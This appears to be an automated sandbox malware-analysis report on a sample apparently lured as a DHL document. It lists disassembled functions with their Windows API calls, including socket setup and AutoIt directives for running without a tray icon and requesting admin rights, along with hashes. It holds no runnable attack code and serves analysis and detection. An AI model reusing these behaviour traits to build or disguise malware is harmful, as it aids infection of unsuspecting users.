                                                                                            Function 008B4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,008BCC08,00000000,?,?,?,?), ref: 008B44AA
                                                                                            • GetWindowLongW.USER32 ref: 008B44C7
                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008B44D7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long
                                                                                            • String ID: SysTreeView32
                                                                                            • API String ID: 847901565-1698111956
                                                                                            • Opcode ID: ba7880ca345cf238305407f9e7ed0cc1680e11c26a28ec1dcea8980e5390bcaf
                                                                                            • Instruction ID: 5cc221d2ebbbf665f0295afe85163a045879706e527ba4dd40ca024305319a70
                                                                                            • Opcode Fuzzy Hash: ba7880ca345cf238305407f9e7ed0cc1680e11c26a28ec1dcea8980e5390bcaf
                                                                                            • Instruction Fuzzy Hash: 82317C31210605AFDB208E38DC46BEA7BA9FB09334F205725F975E22E1D770AC609760
                                                                                            Function 008A304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 008A335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,008A3077,?,?), ref: 008A3378
                                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 008A307A
                                                                                            • _wcslen.LIBCMT ref: 008A309B
                                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 008A3106
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                            • String ID: 255.255.255.255
                                                                                            • API String ID: 946324512-2422070025
                                                                                            • Opcode ID: 9e961d643ef4d58f468c8d882eee1d46aabd50e47c993628cf0e9855970004ba
                                                                                            • Instruction ID: ce34499bf2ea28538ce19d4e499a89e61dc4cba7b14752cb919707c5c3f2e163
                                                                                            • Opcode Fuzzy Hash: 9e961d643ef4d58f468c8d882eee1d46aabd50e47c993628cf0e9855970004ba
                                                                                            • Instruction Fuzzy Hash: EA31D5352042059FEB10CF68C485E6A77E0FF16318F248069F915CBB92DB71DE45C761
                                                                                            Function 008B4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 008B4705
                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 008B4713
                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008B471A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                            • String ID: msctls_updown32
                                                                                            • API String ID: 4014797782-2298589950
                                                                                            • Opcode ID: cb2dc76f2b84d5ca85b3e7a9c638ac75b1ad5fe04553384d9f9699f357fdf254
                                                                                            • Instruction ID: f41f41544404f165ecc57f6acc3ed1bfcca901f036074bac7e7398bc839528b6
                                                                                            • Opcode Fuzzy Hash: cb2dc76f2b84d5ca85b3e7a9c638ac75b1ad5fe04553384d9f9699f357fdf254
                                                                                            • Instruction Fuzzy Hash: BB215EB5600209AFEB10DF68DC86DBB37ADFB5A3A4B040059FA01DB351DB71EC51CA61
                                                                                            Function 008895AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                            • API String ID: 176396367-2734436370
                                                                                            • Opcode ID: 56f43e7dfa4b099e7390dd3175be2631fcf7817a2b4dee218c1fe1a4a65f8b6b
                                                                                            • Instruction ID: 4d6d32ae97b2f33d155eddf36c73b09ccc9b83452c6f09111c876344f106966e
                                                                                            • Opcode Fuzzy Hash: 56f43e7dfa4b099e7390dd3175be2631fcf7817a2b4dee218c1fe1a4a65f8b6b
                                                                                            • Instruction Fuzzy Hash: 9D210872204525A6D331FA299C02FBB7398FFA1314F184426F98AD7142FB55AD41C3D6
                                                                                            Function 008B37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 008B3840
                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 008B3850
                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 008B3876
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$MoveWindow
                                                                                            • String ID: Listbox
                                                                                            • API String ID: 3315199576-2633736733
                                                                                            • Opcode ID: 809aee167c13ec829ac24e4475a0f878bc26d14c4bca9fcc8f99c5683435e168
                                                                                            • Instruction ID: 65fb2f60acfb634c3845cbb02970194d83a451165f47ebb80085023cf6bbeee2
                                                                                            • Opcode Fuzzy Hash: 809aee167c13ec829ac24e4475a0f878bc26d14c4bca9fcc8f99c5683435e168
                                                                                            • Instruction Fuzzy Hash: DA218E72610218BBEF218F65DC85EFB376EFF89754F118124F9149B290CA71DC5287A0
                                                                                            Function 008949F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00894A08
                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00894A5C
                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,008BCC08), ref: 00894AD0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                            • String ID: %lu
                                                                                            • API String ID: 2507767853-685833217
                                                                                            • Opcode ID: 27a2bd5f7235354bda5fcf49e570d3f834f32b869e0f9f4d7df9ebaf5c5707b6
                                                                                            • Instruction ID: add53ead10c23e86a62bba4ef2b7fdd734e3f57d9fddd09e803bbc8252bc488c
                                                                                            • Opcode Fuzzy Hash: 27a2bd5f7235354bda5fcf49e570d3f834f32b869e0f9f4d7df9ebaf5c5707b6
                                                                                            • Instruction Fuzzy Hash: A7314F71A00119AFDB10DF58C885EAA7BF8FF44308F1440A5F505EB252D771ED46CB61
                                                                                            Function 008B41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008B424F
                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008B4264
                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 008B4271
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: msctls_trackbar32
                                                                                            • API String ID: 3850602802-1010561917
                                                                                            • Opcode ID: 83b5ad6f484ef93b7ef1da41fea95d560f311a945cbf8664b9de0d8b5d92276e
                                                                                            • Instruction ID: 66a234cac0111ecd3781cbb175ede4ae33041ad85c9263195741122d2eacf367
                                                                                            • Opcode Fuzzy Hash: 83b5ad6f484ef93b7ef1da41fea95d560f311a945cbf8664b9de0d8b5d92276e
                                                                                            • Instruction Fuzzy Hash: CE11E331240248BEEF205E29CC06FEB3BACFF95B54F110124FA55E2191D271DC519B50
                                                                                            Function 00882F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                              • Part of subcall function 00882DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00882DC5
                                                                                              • Part of subcall function 00882DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00882DD6
                                                                                              • Part of subcall function 00882DA7: GetCurrentThreadId.KERNEL32 ref: 00882DDD
                                                                                              • Part of subcall function 00882DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00882DE4
                                                                                            • GetFocus.USER32 ref: 00882F78
                                                                                              • Part of subcall function 00882DEE: GetParent.USER32(00000000), ref: 00882DF9
                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00882FC3
                                                                                            • EnumChildWindows.USER32(?,0088303B), ref: 00882FEB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                            • String ID: %s%d
                                                                                            • API String ID: 1272988791-1110647743
                                                                                            • Opcode ID: 71ef9bb42f3881abf8525d39eb94674f11e97bcc5d419cfcfd7c41fdea7f35b2
                                                                                            • Instruction ID: d256d60ecd7f94594a991b791ece58c5b944e98d3dd8cdde36c915c698f4cda1
                                                                                            • Opcode Fuzzy Hash: 71ef9bb42f3881abf8525d39eb94674f11e97bcc5d419cfcfd7c41fdea7f35b2
                                                                                            • Instruction Fuzzy Hash: B711E1716002096BCF107F789C85EEE3B6AFF94314F044079F909EB292EE3099498B71
                                                                                            Function 008B5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008B58C1
                                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008B58EE
                                                                                            • DrawMenuBar.USER32(?), ref: 008B58FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                            • String ID: 0
                                                                                            • API String ID: 3227129158-4108050209
                                                                                            • Opcode ID: 8882f5394503ecfa775e74f5a60b9dd8c5bea1921ff0b94b8c2e83d6f41ca7e2
                                                                                            • Instruction ID: d0c607240c316fc33d11d3fdb94c2066d99eb69f1250cb732d6d3aeef08256eb
                                                                                            • Opcode Fuzzy Hash: 8882f5394503ecfa775e74f5a60b9dd8c5bea1921ff0b94b8c2e83d6f41ca7e2
                                                                                            • Instruction Fuzzy Hash: 62016D31500218EFDB219F15EC44BEEBBB4FF45364F1480AAF949DA261DB308A84DF61
                                                                                            Function 0088007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9085167329cddac9def75ec416aae69377ac367d5adfe28254af1560d4f7f4fc
                                                                                            • Instruction ID: 97beef80d0d67a8697d3df95a2c9dbb87790bdb322295f81596c1ba7affa3187
                                                                                            • Opcode Fuzzy Hash: 9085167329cddac9def75ec416aae69377ac367d5adfe28254af1560d4f7f4fc
                                                                                            • Instruction Fuzzy Hash: 62C17B75A0020AEFDB54DFA8C898AAEB7B5FF48314F208598E505EB251C771EE45CF90
                                                                                            Function 00853E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: __alldvrm$_strrchr
                                                                                            • String ID:
                                                                                            • API String ID: 1036877536-0
                                                                                            • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                            • Instruction ID: 63a63611879a16d14e5bebd5b67a5cdd269d55f8c1d5826fcaf0c884007a538e
                                                                                            • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                            • Instruction Fuzzy Hash: F9A16872D00B869FDB11CF18C8817AEBBE4FF61399F28416DE985DB282C6348989C751
                                                                                            Function 008A342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearInitInitializeUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 1998397398-0
                                                                                            • Opcode ID: ef4645c02a88cc4143b27be77986e35f7282d4f48c3cb5cb8f9bc3bf89c349ac
                                                                                            • Instruction ID: f26c6da685fd9965d3a8c9739618e6e5dd4b9df45afdd861dc0e743d8a0d4135
                                                                                            • Opcode Fuzzy Hash: ef4645c02a88cc4143b27be77986e35f7282d4f48c3cb5cb8f9bc3bf89c349ac
                                                                                            • Instruction Fuzzy Hash: 78A16A756043109FDB00DF28C585A2AB7E5FF89714F048859F98AEB762DB70EE41CB92
                                                                                            Function 00880436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,008BFC08,?), ref: 008805F0
                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,008BFC08,?), ref: 00880608
                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,008BCC40,000000FF,?,00000000,00000800,00000000,?,008BFC08,?), ref: 0088062D
                                                                                            • _memcmp.LIBVCRUNTIME ref: 0088064E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                            • String ID:
                                                                                            • API String ID: 314563124-0
                                                                                            • Opcode ID: 43b8ac51efbd5c4e0560e77aafaba2938217317e5088bc1fd53988154cea1261
                                                                                            • Instruction ID: 0a24f7332a2419ff640b54d584e3e12f3edf44d0139e4acd909441dc65790732
                                                                                            • Opcode Fuzzy Hash: 43b8ac51efbd5c4e0560e77aafaba2938217317e5088bc1fd53988154cea1261
                                                                                            • Instruction Fuzzy Hash: F881E971A00209AFCB44DF94C984DEEB7B9FF89315F204558E516EB250DB71AE4ACF60
                                                                                            Function 00861391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: cecdf6b9eb4b047c8a44753dca5cd099e1df86513180a7bfbd591680ca6ca00d
                                                                                            • Instruction ID: 461ec45e861bedc0956a0550b147e67523cd6314103a700e77da4fc5825e9221
                                                                                            • Opcode Fuzzy Hash: cecdf6b9eb4b047c8a44753dca5cd099e1df86513180a7bfbd591680ca6ca00d
                                                                                            • Instruction Fuzzy Hash: 31411B31A00115ABDF216BBD8C4EABE3AA6FF41370F1E4225F919D7293EE7488415367
                                                                                            Function 008B6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetWindowRect.USER32(00B413F0,?), ref: 008B62E2
                                                                                            • ScreenToClient.USER32(?,?), ref: 008B6315
                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 008B6382
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                            • String ID:
                                                                                            • API String ID: 3880355969-0
                                                                                            • Opcode ID: 5489c915ffaa0b7f0cece7239c2dc839d49da8a3a27ad2938e2f9b25b678f1e3
                                                                                            • Instruction ID: a4d3ce094bc08ba82370d565a0ba9bf5c0343f3ae17efbd1c7f9b9111748e2b6
                                                                                            • Opcode Fuzzy Hash: 5489c915ffaa0b7f0cece7239c2dc839d49da8a3a27ad2938e2f9b25b678f1e3
                                                                                            • Instruction Fuzzy Hash: 35511774A00209EFDB10DF68D8849AE7BB5FB59360F108269F915DB3A0E774AD91CB90
                                                                                            Function 008A1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 008A1AFD
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A1B0B
                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 008A1B8A
                                                                                            • WSAGetLastError.WSOCK32 ref: 008A1B94
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
